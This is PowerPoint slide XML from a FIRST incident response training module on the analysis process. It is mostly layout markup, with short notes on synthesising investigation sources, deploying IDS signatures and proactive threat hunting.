            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>As you collect and review your additional information sources, you will gain a greater understanding about this incident. That is, you will synthesize information from all your sources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Finally, your analysis will lead to a conclusion. For example, you decide a new IDS signature must be created and deployed to your firewall servers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Something equally as important and used in different circumstances is a proactive investigation, or exploratory analysis, often referred to as “hunting.” Hunting can lead to the discovery of another trigger to launch an investigation. For example, if you can find out about existing attacks, such as an advisory or IDS alert, before your organization is attacked, you will be well prepared. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="21590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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>We will be looking at each component of the investigation arena, staring with the addition of other relevant sources. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8935EC-1106-2149-9CD1-34BBB89999B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{454227C6-E2F0-BD4C-8EEB-6FAA2572BC35}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E6D2F32-D1F8-4641-AEF4-83AE16E1E2DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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cSld name="Title Slide">
    <p:bg>
      <p:bgPr>
        <a:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 15"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Shape 16" descr="ttps://www.first.org/identity/first-org.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228601" y="5177244"/>
            <a:ext cx="2590800" cy="1588682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="3646713"/>
            <a:ext cx="5410200" cy="704851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" marR="0" lvl="1"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2pPr>
            <a:lvl3pPr marL="0" marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="0" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="0" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="342900" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="685800" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="1028700" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="1371600" marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="4620208"/>
            <a:ext cx="4876800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342900" marR="0" lvl="1" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685800" marR="0" lvl="2" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1028700" marR="0" lvl="3" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1371600" marR="0" lvl="4" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1714500" marR="0" lvl="5" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1350" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2057400" marR="0" lvl="6" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1350" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2400300" marR="0" lvl="7" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1350" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2743200" marR="0" lvl="8" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1350" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="444643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The End, My Friend">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 50"/>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7000" y="1524000"/>
            <a:ext cx="6350000" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10541097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9F0B8B-A103-2E46-B4E5-886A95D19ADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="273050"/>
            <a:ext cx="8228013" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5572368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19"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1479551"/>
            <a:ext cx="8292704" cy="4703763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="171450" marR="0" lvl="0" indent="-38100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="514350" marR="0" lvl="1" indent="-5715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2pPr>
            <a:lvl3pPr marL="857250" marR="0" lvl="2" indent="-7620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200150" marR="0" lvl="3" indent="-5715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1543050" marR="0" lvl="4" indent="-5715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1885950" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2228850" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="2571750" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="2914650" marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="365126"/>
            <a:ext cx="8292704" cy="879475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" marR="0" lvl="1"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2pPr>
            <a:lvl3pPr marL="0" marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="0" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="0" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="342900" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="685800" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="1028700" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="1371600" marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3461148" y="6416676"/>
            <a:ext cx="1758553" cy="288925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US" sz="900" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9436663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23"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3461148" y="6416676"/>
            <a:ext cx="1758553" cy="288925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="9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1048708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Section">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2317750" y="2257428"/>
            <a:ext cx="4349750" cy="2416175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="2700" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" marR="0" lvl="1"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2pPr>
            <a:lvl3pPr marL="0" marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="0" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="0" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="342900" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="685800" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="1028700" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="1371600" marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
